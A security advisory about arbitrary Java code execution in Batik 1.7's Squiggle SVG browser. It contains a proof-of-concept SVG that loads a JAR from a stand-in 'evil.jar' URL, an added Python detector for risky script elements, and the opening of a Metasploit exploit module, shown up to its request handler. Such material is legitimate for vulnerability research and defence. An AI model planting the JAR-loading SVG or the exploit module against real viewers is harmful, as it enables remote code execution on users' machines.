Published: 2012-05-15
Updated: 2012-05-22
Affected systems:
W3C SVG Scalable Vector Graphics (SVG) Tiny 1.2
W3C SVG Scalable Vector Graphics (SVG) 1.2
Apache Group Batik SVG Toolkit 1.7
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 53552
Scalable Vector Graphics (SVG) is an XML-based graphics format for describing two-dimensional vector graphics. SVG is defined by the W3C and is an open standard.
Implementations of the SVG 1.1 and SVG Tiny 1.2 specifications contain an arbitrary code execution vulnerability; an attacker can exploit it to execute arbitrary code and perform unauthorized operations.
Test method:
--------------------------------------------------------------------------------
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users act at their own risk!
Christian Johansson () provided the following test method:
<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink"
     version="1.0">
  <script type="application/java-archive" xlink:href="http://www.example.com/evil.jar"/>
  <text>Static text ...</text>
</svg>
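The test document above relies on two things a plain SVG viewer should not accept from untrusted content: a script element whose type is application/java-archive rather than an ECMAScript type, and an external xlink:href pointing at a JAR. As an added defender-side example (not part of this advisory, of Batik or of the Metasploit module below), the following Python script parses an SVG document and reports both conditions; the sample inputs are constructed here and the function names are my own.

```python
"""Flag SVG <script> elements that could load executable content:
a non-ECMAScript MIME type (e.g. application/java-archive) or an
external reference via xlink:href. Added example, not advisory code."""
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
XLINK_HREF = "{%s}href" % XLINK_NS
SCRIPT_TAGS = ("{%s}script" % SVG_NS, "script")

# Script types an SVG viewer is expected to run as ECMAScript; anything
# else (in particular application/java-archive) is reported.
ECMASCRIPT_TYPES = {"", "text/ecmascript", "application/ecmascript",
                    "text/javascript", "application/javascript"}

# Schemes that would make the viewer fetch code from somewhere else.
REMOTE_SCHEMES = {"http", "https", "ftp", "file", "jar"}


def find_script_risks(svg_text):
    """Return a list of (reason, value) findings for one SVG document.

    Parsing uses xml.etree (expat), which does not fetch external
    entities; for fully untrusted input consider defusedxml as well.
    """
    findings = []
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        return [("parse-error", str(exc))]

    for el in root.iter():
        # Match <script> in the SVG namespace or, in sloppy files, unqualified.
        if el.tag not in SCRIPT_TAGS:
            continue
        stype = (el.get("type") or "").strip().lower()
        if stype not in ECMASCRIPT_TYPES:
            findings.append(("non-ecmascript-script-type", stype))
        href = el.get(XLINK_HREF) or el.get("href")
        if href and urlparse(href).scheme.lower() in REMOTE_SCHEMES:
            findings.append(("external-script-reference", href))
    return findings


# Constructed sample mirroring the advisory's test document (hypothetical URL).
SAMPLE_MALICIOUS = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0">
  <script type="application/java-archive"
          xlink:href="http://www.example.com/evil.jar"/>
  <text>Static text ...</text>
</svg>"""

# Constructed benign sample: inline ECMAScript only, no external reference.
SAMPLE_BENIGN = """<svg xmlns="http://www.w3.org/2000/svg" version="1.1">
  <script type="text/ecmascript">var x = 1;</script>
  <text>hello</text>
</svg>"""


if __name__ == "__main__":
    for name, doc in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(name, find_script_risks(doc))
```

The check keys only on markup, which is what a gateway or upload filter can see; on the viewer side the runtime control named in the Metasploit description, Batik's "Enforce secure scripting" setting, is what actually stops the JAR from being loaded.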
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Squiggle 1.7 SVG Browser Java Code Execution",
      'Description'    => %q{
        This module abuses the SVG support to execute Java Code in the
        Squiggle Browser included in the Batik framework 1.7 through a
        crafted svg file referencing a jar file.

        In order to gain arbitrary code execution, the browser must meet
        the following conditions: (1) It must support at least SVG version
        1.1 or newer, (2) It must support Java code and (3) The "Enforce
        secure scripting" check must be disabled.

        The module has been tested against Windows and Linux platforms.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Nicolas Gregoire',  # aka @Agarri_FR, Abuse discovery and PoC
          'sinn3r',            # Metasploit
          'juan vazquez'       # Metasploit
        ],
      'References'     =>
        [
          ['URL', 'http://www.agarri.fr/blog/']
        ],
      'Payload'        =>
        {
          'Space'       => 20480,
          'BadChars'    => '',
          'DisableNops' => true
        },
      'DefaultOptions' =>
        {
          'ExitFunction' => "none"
        },
      'Platform'       => ['win', 'linux', 'java'],
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Arch' => ARCH_JAVA,
            }
          ],
          [ 'Windows Universal',
            {
              'Arch'     => ARCH_X86,
              'Platform' => 'win'
            }
          ],
          [ 'Linux x86',
            {
              'Arch'     => ARCH_X86,
              'Platform' => 'linux'
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "May 11 2012",
      'DefaultTarget'  => 0))
  end

  def on_request_uri(cli, request)